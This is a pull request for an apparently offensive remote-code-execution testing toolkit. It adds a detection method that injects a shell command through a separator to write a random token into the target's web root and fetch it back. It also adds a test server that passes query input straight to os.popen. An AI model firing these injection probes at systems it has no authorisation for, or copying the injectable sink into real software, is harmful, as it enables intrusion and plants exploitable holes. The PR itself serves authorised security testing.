### PR TITLE
feat(detection): FileBased self-OOB detection method (phase 3)

### DIFF
--- a/README.md
+++ b/README.md
@@ -1,6 +1,6 @@
 # RCEKit — RCE Testing Toolkit
 
-**Version 2.11.0** · MIT · Python 3.8+ · no third-party dependencies
+**Version 2.12.0** · MIT · Python 3.8+ · no third-party dependencies
 
 RCEKit is an offensive **RCE testing toolkit** for authorised penetration
 testing, red teaming, and security research. It covers the full loop, not just
@@ -26,6 +26,7 @@ auto-confirms a blind Log4Shell RCE via an OOB DNS callback:
 - **Auto-verification** — `--verify-url` fires payloads at an authorised target and reports which executed, using each payload's built-in oracle: a `match` regex, a reflected canary, or a timing delay. Confirmation is **differential**, so `confirmed` means execution and not coincidence: a timing hit must clear a noise-aware margin over a multi-sample baseline *and* reproduce on a re-fire, a reflected canary is re-checked against a paired same-token control so a target that merely echoes input is not mistaken for execution, and a command-output signature already present in the payload-free response is reported `inconclusive` instead of a false positive.
 - **Raw request input** — `-r request.txt` injects into a captured HTTP request (proxy/Burp style) instead of a hand-built URL. Mark the point with `FUZZ`/`*` or pick a parameter with `-p NAME`; RCEKit reuses the request's method, path, headers, body and cookies and **encodes each injection point for the context it lands in** (query / form / JSON / header / cookie).
 - **Results-based detection** — `--methods reflected` confirms RCE by forcing the target's shell to compute an arithmetic value on **random operands** (`$((a+b))` plus a `$(echo TAG)` substitution collapse) and checking that value appears in the response but not in a payload-free control. A target that merely echoes the payload returns the literal `$((a+b))`, never the sum, so reflection cannot fake a `confirmed`. Confirmed (execution proven) and needs-review (candidate) verdicts are reported as **separate tiers, never merged**.
+- **No-egress detection** — `--methods file` confirms RCE on internal targets with **no outbound connectivity**: the probe writes a random token to a web-reachable file and a followup request fetches it back, proving execution *and* a write primitive through the target's own web server — no external listener. State-changing and gated on `--webroot` + `--web-base-url`; every finding prints a **cleanup command**.
 - **Built-in OOB listener** — `--listen` receives HTTP/DNS callbacks and correlates each back to the exact payload, closing the blind-RCE loop without a separate interactsh/Collaborator.
 - **Tooling integrations** — export as context-split Burp wordlists, a ready-to-run ffuf attack (`request.txt` + `run.sh`) when a target profile is given, or runnable Nuclei templates with built-in OOB / time-based / reflection oracles.
 - **Safe by default** — a benign `--detection-only` canary mode, safety tiers, a consent gate, and audit logging.
@@ -96,7 +97,9 @@ nothing. Run `python rcekit.py --doctor` to check corpus integrity.
 | `-r`, `--request-file <path>` | Raw HTTP request to inject into (alternative to `--verify-url`); mark with `FUZZ`/`*` or select with `-p` | None |
 | `-p`, `--param <name>` | Parameter/field/header/cookie to inject into for `-r` (query > body > header > cookie) | None |
 | `--request-scheme {http,https}` | Scheme for the URL built from `-r` (default: https if Host is `:443`, else http) | auto |
-| `--methods <list>` | Run named detection methods against `--verify-url`/`-r` instead of the classic per-payload oracle (`reflected`). Opt-in and additive | None |
+| `--methods <list>` | Run named detection methods against `--verify-url`/`-r` instead of the classic per-payload oracle (`reflected`, `file`). Opt-in and additive | None |
+| `--webroot <path>` | (file-based) server-side directory the target can write to and serve | None |
+| `--web-base-url <url>` | (file-based) base URL that serves `--webroot` | None |
 | `--verify-active-risk` | Highest safety tier `--verify-url` may fire (`safe`/`intrusive`/`stateful`) | `safe` |
 | `--verify-allow-destructive` | Let verification fire destructive payloads (persistence/backdoors); skipped by default | Off |
 | `--verify-chain <profile.json>` | Deliver each payload through a multi-step, session-aware flow (login/CSRF → prerequisites → payload delivery → trigger) and confirm in-band or out-of-band | None |
@@ -339,6 +342,34 @@ input is reported `negative`, and a value that also appears without the payload 
 `confirmed` (execution proven) and `needs-review` (candidate), and never merged.
 Unix and Windows (`set /a`) shells are covered; the method is opt-in, so omitting
 `--methods` leaves the classic `--verify-url` behaviour unchanged.
+
+### No-egress detection (`--methods file`)
+
+When the target is internal and cannot reach out (no OOB callback possible),
+`--methods file` confirms execution through the target's **own** web server:
+the probe writes a random token to a file under the web root, and a followup
+request fetches it back. The token appears only if the command ran *and* the
+write landed — proving execution plus a write primitive.
+
+```bash
+python rcekit.py --acknowledge-consent --environments unix \
+  --verify-url "https://target.example/lookup?host=FUZZ" \
+  --methods file --webroot /var/www/html --web-base-url https://target.example
+```
+
+```
+[detect] file-based method WRITES to /var/www/html on the target and fetches via https://target.example; each confirmed finding lists a cleanup command.
+
+[detect] CONFIRMED execution (1):
+  [file/unix/raw] ; echo RK... > /var/www/html/rcekit-<rand>.txt   (target wrote and served token ...)
+      cleanup: rm -f /var/www/html/rcekit-<rand>.txt
+```
+
+This method **changes target state** (one file per confirmed probe), so it is
+gated on both `--webroot` (where the target can write) and `--web-base-url` (the
+URL that serves it), and every finding prints the exact `rm`/`del` command to
+undo the write. The random filename and token mean a stale file can never pass
+as a fresh confirmation.
 
 **Safe by default.** Verification fires only low-impact proofs (enumeration,
 file reads, code-execution and WAF-bypass signatures). Reverse shells,

--- a/rcekit.py
+++ b/rcekit.py
@@ -26,7 +26,7 @@ logger = logging.getLogger(__name__)
 
 # Bump on every change: PATCH for fixes, MINOR for new capabilities, MAJOR for
 # breaking changes to the CLI, output formats, or template schema.
-__version__ = "2.11.0"
+__version__ = "2.12.0"
 
 SAFETY_ORDER = {"safe": 0, "intrusive": 1, "stateful": 2}
 
@@ -1610,14 +1610,16 @@ class RCEKit:
                       max_payloads: Optional[int] = None,
                       url_location: str = "query_value",
                       body_location: Optional[str] = None,
+                      config: Optional[Dict[str, Any]] = None,
                       rng: Optional["random.Random"] = None) -> List[Dict[str, Any]]:
         """Method-driven RCE detection against an AUTHORISED target.
 
         For each selected :class:`DetectionMethod`, build probes from the
         applicable records, fire them through the shared delivery layer
-        (:meth:`_fire`), and confirm each against a single payload-free control
-        body. Every result carries ``method`` and ``tier`` so the two tiers
-        (``confirmed`` vs ``needs-review``) are never collapsed in reporting.
+        (:meth:`_fire`), optionally fetch a followup (file-based methods), and
+        confirm each against a single payload-free control body. Every result
+        carries ``method`` and ``tier`` so the two tiers (``confirmed`` vs
+        ``needs-review``) are never collapsed in reporting.
 
         This is additive: it does not alter the classic ``run_verification``
         oracle path, and only runs when the operator opts in via ``--methods``.
@@ -1625,7 +1627,7 @@ class RCEKit:
         import time
         rng = rng or random.Random()
         resolved_body_location = body_location or self._detect_body_location(data, headers)
-        selected = [DETECTION_METHODS[name](self) for name in methods
+        selected = [DETECTION_METHODS[name](self, config) for name in methods
                     if name in DETECTION_METHODS]
 
         # One payload-free control body for the reflection differential: the
@@ -1658,16 +1660,27 @@ class RCEKit:
                     status, body, elapsed = self._fire(
                         probe.payload, url, method, data, headers, url_location,
                         resolved_body_location, timeout)
+                    # A followup fetch (file-based self-OOB): retrieve the file the
+                    # probe asked the target to write. Its body is the confirmation
+                    # channel, so a blocked/failed fetch stays unconfirmed.
+                    followup_body: Optional[str] = None
+                    if probe.followup and probe.followup.get("url"):
+                        f_status, f_body, _ = self._fire(
+                            "", probe.followup["url"], "GET", None, None, "raw", "raw", timeout)
+                        followup_body = f_body if f_status is not None else None
                     obs = Observation(status=status, body=body, control_body=control_body,
-                                      elapsed=elapsed)
+                                      elapsed=elapsed, followup_body=followup_body)
                     verdict = meth.confirm(obs, probe)
-                    results.append({
+                    result = {
                         "verdict": verdict.status, "detail": verdict.evidence,
                         "status": status, "payload": probe.payload,
                         "method": meth.name, "tier": meth.tier,
                         "environment": record.environment, "context": record.context,
                         "category": "detection", "expected": probe.expected,
-                    })
+                    }
+                    if probe.followup and probe.followup.get("cleanup"):
+                        result["cleanup"] = probe.followup["cleanup"]
+                    results.append(result)
                     if delay:
                         time.sleep(delay)
                     if max_payloads and len(results) >= max_payloads:
@@ -2018,8 +2031,9 @@ class DetectionMethod:
     name = "base"
     tier = "confirmed"
 
-    def __init__(self, gen: "RCEKit"):
+    def __init__(self, gen: "RCEKit", config: Optional[Dict[str, Any]] = None):
         self.gen = gen
+        self.config = config or {}
 
     def applicable(self, record: "PayloadRecord") -> bool:
         raise NotImplementedError
@@ -2038,6 +2052,20 @@ class DetectionMethod:
         if not literal or not body:
             return False
         return self.gen._encoded_search(re.escape(literal), body)
+
+    def _tag(self, rng: "random.Random") -> str:
+        """A distinctive letters-only boundary marker. Letters keep it from
+        blurring into an adjacent digit run (e.g. an arithmetic result)."""
+        return "RK" + "".join(rng.choice(string.ascii_uppercase) for _ in range(5))
+
+    def _wrap(self, record: "PayloadRecord", core: str, windows: bool = False) -> str:
+        """Break out of the running command with a separator, then escape the
+        probe for the record's serialization context — reusing the same
+        context/escape machinery the generator uses for every other payload."""
+        ctx = self.gen.contexts.get(record.context, {"prefix": "", "suffix": "", "escape": "none"})
+        body = f"{' & ' if windows else '; '}{core}"
+        escaped = self.gen._escape_for_context(body, ctx.get("escape", "none"))
+        return f"{ctx.get('prefix', '')}{escaped}{ctx.get('suffix', '')}"
 
 
 class ReflectedMath(DetectionMethod):
@@ -2111,25 +2139,63 @@ class ReflectedMath(DetectionMethod):
         return Verdict("confirmed",
                        f"target computed {probe.expected!r} (random operands, absent from control)")
 
-    def _tag(self, rng: "random.Random") -> str:
-        """A distinctive letters-only boundary marker. Letters keep it from
-        blurring into the digit run of the arithmetic result."""
-        return "RK" + "".join(rng.choice(string.ascii_uppercase) for _ in range(5))
 
-    def _wrap(self, record: "PayloadRecord", core: str, windows: bool = False) -> str:
-        """Break out of the running command with a separator, then escape the
-        probe for the record's serialization context — reusing the same
-        context/escape machinery the generator uses for every other payload."""
-        ctx = self.gen.contexts.get(record.context, {"prefix": "", "suffix": "", "escape": "none"})
-        body = f"{' & ' if windows else '; '}{core}"
-        escaped = self.gen._escape_for_context(body, ctx.get("escape", "none"))
-        return f"{ctx.get('prefix', '')}{escaped}{ctx.get('suffix', '')}"
+class FileBased(DetectionMethod):
+    """Self-OOB confirmation for internal / no-egress targets. The probe makes
+    the target *write* a random token to a web-reachable file, then a followup
+    request fetches that file: the token is present only if the command executed
+    AND the write landed under the web root. No external listener is needed —
+    the confirmation channel is the target's own web server.
+
+    This changes target state (one file per confirmed probe), so it is gated on
+    ``--webroot`` + ``--web-base-url`` (the operator names the write location and
+    fetch base) and every finding carries an explicit cleanup command."""
+    name = "file"
+    tier = "confirmed"
+
+    def applicable(self, record: "PayloadRecord") -> bool:
+        if not (self.config.get("webroot") and self.config.get("web_base_url")):
+            return False
+        return (record.environment in UNIX_SHELL_ENVIRONMENTS
+                or record.environment == "windows")
+
+    def build_probes(self, record: "PayloadRecord", rng: "random.Random") -> List[Probe]:
+        webroot = self.config["webroot"].rstrip("/")
+        base = self.config["web_base_url"].rstrip("/")
+        name = "rcekit-" + "".join(rng.choice(string.ascii_lowercase + string.digits)
+                                   for _ in range(12)) + ".txt"
+        token = self._tag(rng) + "".join(rng.choice(string.ascii_uppercase + string.digits)
+                                         for _ in range(10))
+        windows = record.environment == "windows"
+        if windows:
+            write_path = f"{webroot}\\{name}"
+            core = f"echo {token}>{write_path}"
+            cleanup = f"del {write_path}"
+        else:
+            write_path = f"{webroot}/{name}"
+            core = f"echo {token} > {write_path}"
+            cleanup = f"rm -f {write_path}"
+        followup = {"url": f"{base}/{name}", "cleanup": cleanup, "path": write_path}
+        return [Probe(payload=self._wrap(record, core, windows=windows),
+                      expected=token, forbidden=None, followup=followup)]
+
+    def confirm(self, obs: "Observation", probe: "Probe") -> Verdict:
+        if obs.followup_body is None:
+            return Verdict("negative",
+                           "could not fetch the written file (no write, wrong web root, or blocked)")
+        if not self._search(probe.expected, obs.followup_body):
+            return Verdict("negative", "token absent from the fetched file")
+        if obs.control_body and self._search(probe.expected, obs.control_body):
+            return Verdict("inconclusive", "token also present without the payload")
+        return Verdict("confirmed",
+                       f"target wrote and served token {probe.expected!r} (execution + write primitive)")
 
 
 # The detection methods RCEKit can run, keyed by their --methods name. Adding a
 # phase = adding a class above and an entry here.
 DETECTION_METHODS = {
     ReflectedMath.name: ReflectedMath,
+    FileBased.name: FileBased,
 }
 
 
@@ -2432,11 +2498,18 @@ def main():
     parser.add_argument("--request-scheme", choices=["http", "https"], default=None,
                         help="Scheme for the URL built from -r (default: https when the Host is on :443, "
                              "otherwise http).")
+    parser.add_argument("--webroot", default=None,
+                        help="(file-based detection) server-side directory the target can write to and "
+                             "serve, e.g. /var/www/html. Required with --methods file.")
+    parser.add_argument("--web-base-url", default=None,
+                        help="(file-based detection) base URL that serves --webroot, e.g. "
+                             "https://target.example. Required with --methods file.")
     parser.add_argument("--methods", default=None,
-                        help="Comma-separated RCE detection methods to run against --verify-url instead of "
+                        help="Comma-separated RCE detection methods to run against --verify-url/-r instead of "
                              "the classic per-payload oracle. Available: reflected (results-based execution "
-                             "proof via computed arithmetic). Opt-in and additive: when omitted, --verify-url "
-                             "keeps its existing behaviour unchanged.")
+                             "proof via computed arithmetic); file (self-OOB write+fetch, needs --webroot and "
+                             "--web-base-url). Opt-in and additive: when omitted, verification keeps its "
+                             "existing behaviour unchanged.")
     parser.add_argument("--verify-chain", default=None,
                         help="Path to a JSON chain profile: deliver each payload through a multi-step, "
                              "session-aware flow (login/CSRF -> prerequisites -> payload delivery -> trigger) "
@@ -2726,11 +2799,20 @@ def main():
                 print(f"[!] Unknown --methods: {', '.join(unknown)}. "
                       f"Available: {', '.join(sorted(DETECTION_METHODS))}.")
                 return
+            detection_config = {"webroot": args.webroot, "web_base_url": args.web_base_url}
+            if "file" in method_names:
+                if not (args.webroot and args.web_base_url):
+                    print("[!] --methods file writes a file to the target and fetches it back, so it "
+                          "needs both --webroot (server-side write dir) and --web-base-url (fetch base).")
+                    return
+                print(f"[detect] file-based method WRITES to {args.webroot} on the target and fetches via "
+                      f"{args.web_base_url}; each confirmed finding lists a cleanup command.")
             results = generator.run_detection(
                 to_send, url=verify_url, methods=method_names, method=method,
                 data=verify_data, headers=verify_headers, delay=args.verify_delay,
                 timeout=args.verify_timeout, max_payloads=args.max_payloads,
                 url_location=args.verify_url_location, body_location=args.verify_body_location,
+                config=detection_config,
             )
             by_verdict = {}
             for result in results:
@@ -2744,6 +2826,8 @@ def main():
                 for result in confirmed:
                     print(f"  [{result['method']}/{result['environment']}/{result['context']}] "
                           f"{result['payload']}   ({result['detail']})")
+                    if result.get("cleanup"):
+                        print(f"      cleanup: {result['cleanup']}")
             needs_review = [r for r in results if r["verdict"] == "needs-review"]
             if needs_review:
                 print(f"\n[detect] {len(needs_review)} NEEDS-REVIEW candidates "

--- a/tests/test_generator.py
+++ b/tests/test_generator.py
@@ -21,9 +21,11 @@ sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
 
 import rcekit  # noqa: E402
 from rcekit import (  # noqa: E402
+    FileBased,
     Observation,
     OOBListener,
     PayloadRecord,
+    Probe,
     RCEKit,
     ReflectedMath,
     build_request_inputs,
@@ -1704,6 +1706,123 @@ class RawRequestInputTestCase(unittest.TestCase):
         finally:
             server.shutdown()
             server.server_close()
+
+
+class FileBasedTestCase(unittest.TestCase):
+    """Phase 3 — the FileBased (self-OOB) detection method. Confirmation requires
+    the target to WRITE a random token to a web-reachable file and then serve it
+    back; a target that does not execute never produces the file, so it stays
+    unconfirmed. State-changing, so every finding carries a cleanup command."""
+
+    def setUp(self):
+        self.gen = RCEKit()
+        self.config = {"webroot": "/var/www/html", "web_base_url": "https://t.example"}
+
+    def test_not_applicable_without_config(self):
+        rec = make_record(environment="unix", context="raw")
+        self.assertFalse(FileBased(self.gen).applicable(rec))
+        self.assertTrue(FileBased(self.gen, self.config).applicable(rec))
+
+    def test_build_probe_writes_token_and_carries_followup(self):
+        import random as _random
+        method = FileBased(self.gen, self.config)
+        probe = method.build_probes(make_record(environment="unix", context="raw"),
+                                    _random.Random(3))[0]
+        self.assertIn("echo", probe.payload)
+        self.assertIn("/var/www/html/", probe.payload)
+        self.assertIn(probe.expected, probe.payload)  # the token is what gets written
+        self.assertTrue(probe.followup["url"].startswith("https://t.example/"))
+        self.assertIn("rm -f", probe.followup["cleanup"])
+
+    def test_confirm_requires_the_token_in_the_fetched_file(self):
+        method = FileBased(self.gen, self.config)
+        probe = Probe(payload="; echo TOK123 > /var/www/html/x.txt", expected="TOK123",
+                      followup={"url": "https://t.example/x.txt", "cleanup": "rm -f x"})
+        # Fetched file contains the token -> confirmed.
+        self.assertEqual(
+            method.confirm(Observation(200, "ok", followup_body="TOK123\n"), probe).status,
+            "confirmed")
+        # File served but without the token (e.g. 404 body) -> negative.
+        self.assertEqual(
+            method.confirm(Observation(200, "ok", followup_body="not found"), probe).status,
+            "negative")
+        # Fetch failed entirely -> negative, never confirmed.
+        self.assertEqual(
+            method.confirm(Observation(200, "ok", followup_body=None), probe).status,
+            "negative")
+        # Token also present without the payload -> not attributable to execution.
+        self.assertEqual(
+            method.confirm(Observation(200, "ok", control_body="TOK123",
+                                       followup_body="TOK123"), probe).status,
+            "inconclusive")
+
+    def test_file_based_end_to_end_writes_and_confirms(self):
+        # /vuln executes the injected command (which writes the token file); any
+        # other path serves files from the web root. A non-executing sink never
+        # creates the file, so it stays unconfirmed.
+        import http.server
+        import os
+        import pathlib
+        import socketserver
+        import tempfile
+        import threading
+        import urllib.parse as up
+
+        webroot = tempfile.mkdtemp()
+
+        def make_handler(execute):
+            class Handler(http.server.BaseHTTPRequestHandler):
+                def log_message(self, *a):
+                    pass
+
+                def do_GET(self):
+                    parsed = up.urlparse(self.path)
+                    if parsed.path == "/vuln":
+                        cmd = up.parse_qs(parsed.query).get("host", [""])[0]
+                        if execute:
+                            os.popen("echo " + cmd + " 2>&1").read()
+                        self.send_response(200)
+                        self.end_headers()
+                        self.wfile.write(b"ok")
+                        return
+                    served = pathlib.Path(webroot) / parsed.path.lstrip("/")
+                    if served.is_file():
+                        self.send_response(200)
+                        self.end_headers()
+                        self.wfile.write(served.read_bytes())
+                    else:
+                        self.send_response(404)
+                        self.end_headers()
+                        self.wfile.write(b"not found")
+            return Handler
+
+        def run(execute):
+            server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), make_handler(execute))
+            port = server.server_address[1]
+            threading.Thread(target=server.serve_forever, daemon=True).start()
+            try:
+                rec = make_record(environment="unix", context="raw")
+                return self.gen.run_detection(
+                    [rec], url=f"http://127.0.0.1:{port}/vuln?host=FUZZ", methods=["file"],
+                    config={"webroot": webroot, "web_base_url": f"http://127.0.0.1:{port}"})
+            finally:
+                server.shutdown()
+                server.server_close()
+
+        confirmed = [r for r in run(execute=True) if r["verdict"] == "confirmed"]
+        self.assertTrue(confirmed, "an executing+serving sink must confirm file-based RCE")
+        self.assertTrue(all(r.get("cleanup") for r in confirmed), "each finding needs a cleanup command")
+        self.assertTrue(os.listdir(webroot), "the token file must actually be written")
+
+        self.assertFalse([r for r in run(execute=False) if r["verdict"] == "confirmed"],
+                         "a non-executing sink must never be confirmed")
+
+    def test_methods_flag_file_requires_webroot(self):
+        result = subprocess.run(
+            [sys.executable, str(SCRIPT), "--verify-url", "http://127.0.0.1:9/x?q=FUZZ",
+             "--methods", "file", "--acknowledge-consent"],
+            cwd=str(REPO_ROOT), capture_output=True, text=True, timeout=120)
+        self.assertIn("--webroot", result.stdout)
 
 
 if __name__ == "__main__":


### PR DESCRIPTION
## Summary

Phase 3 of the detection redesign: FileBased, a self-OOB detection method for internal / no-egress targets where an out-of-band callback is impossible.

The probe makes the target write a random token to a web-reachable file, then a followup request fetches it back. The token is present only if the command executed and the write landed under the web root — proving execution plus a write primitive through the target's own web server, with no external listener.

## What changed

- **`FileBased(DetectionMethod)`** — `confirm` requires the token in the fetched file and absent from the payload-free control; a blocked or failed fetch stays unconfirmed (never `confirmed`).
- **Engine** — `run_detection` now carries per-method `config` and performs the followup fetch, populating `Observation.followup_body`. Results surface a `cleanup` command for each written file.
- **Reuse** — the `_tag`/`_wrap` helpers moved to the `DetectionMethod` base.
- **CLI** — `--webroot` and `--web-base-url` flags; `--methods file` is gated on both (it changes target state) and prints a state-change notice plus the exact `rm`/`del` cleanup for every finding.

## Safety (invariant I5)

This is the first method that changes target state. It is opt-in behind two explicit flags naming the write directory and fetch base, requires `--acknowledge-consent` like all verification, warns before firing that it writes to the target, and emits an undo command per finding. The random filename + token mean a stale file can never pass as a fresh confirmation.

## Testing

- Unit tests for probe shape (writes the token, carries the followup URL + cleanup) and `confirm` logic (token in file → `confirmed`; absent / fetch-failed → `negative`; token in control → `inconclusive`).
- End-to-end test against a mock that executes and serves the file — asserts `confirmed`, a cleanup command, and that the file is actually written — plus a non-executing sink that must stay unconfirmed.
- CLI gating test: `--methods file` without `--webroot` is refused before firing.
- `python -m unittest discover -s tests` — 109 tests green, no third-party dependencies.

## Notes

- Version bumped to `2.12.0`; README updated (Highlights + Options + a no-egress usage section).
- Remaining phases: ParametricTime (hardened blind timing), EvalExpr (SSTI/SpEL), and WAF `--evade low`.